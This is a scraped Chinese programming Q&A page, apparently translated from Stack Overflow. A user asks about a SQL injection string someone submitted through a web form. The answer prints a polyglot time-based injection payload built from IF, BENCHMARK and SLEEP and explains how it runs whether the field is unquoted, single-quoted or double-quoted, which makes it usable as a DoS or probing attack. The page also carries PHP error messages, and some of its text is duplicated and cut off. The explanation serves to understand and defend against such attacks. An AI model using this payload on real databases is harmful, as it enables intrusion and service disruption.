Warning: file_get_contents(/data/phpspider/zhask/data//catemap/8/mysql/63.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Mysql 谁知道这种sql注入?_Mysql_Code Injection - Fatal编程技术网
Fatal编程技术网
  • mysql/
  • Mysql 谁知道这种sql注入?

Mysql 谁知道这种sql注入?

mysql

Mysql 谁知道这种sql注入?,mysql,code-injection,Mysql,Code Injection,有人通过取消选中表单中的文本字段来注入以下内容: IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEA

有人通过取消选中表单中的文本字段来注入以下内容:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/

IF(SUBSTR(@@version,1,1)它的设计目的是,无论输入框的值在旧版本的MySQL上是无引号的、单引号的还是双引号的,都会对CPU造成严重影响,在新版本的MySQL上,保持连接打开,休眠5秒钟

在每种情况下,如果应用程序易受SQL注入攻击,则可能会执行拒绝服务攻击,因为长时间保持连接打开可能会导致服务器资源/可用连接耗尽


-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:        
/*


-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this: 
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|


--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/



——如果不加引号,它会看到:

如果(SUBSTR(@@version,1,1)它被设计为在保持连接打开的情况下睡眠5秒钟,而不管在MySQL的旧版本和更新版本上输入框的值是无引号、单引号还是双引号,都会对CPU造成严重影响

在每种情况下,如果应用程序易受SQL注入攻击,则可能会执行拒绝服务攻击,因为长时间保持连接打开可能会导致服务器资源/可用连接耗尽


-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:        
/*


-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this: 
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|


--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/



——如果不加引号,它会看到:

如果(SUBSTR(@@version,1,1)我认为它在执行时会减慢速度,如果执行得太多,您的数据库将无法访问/非常慢。有点DoS攻击我认为它在执行时会减慢速度,如果执行得太多,您的数据库将无法访问/非常慢。有点DoS攻击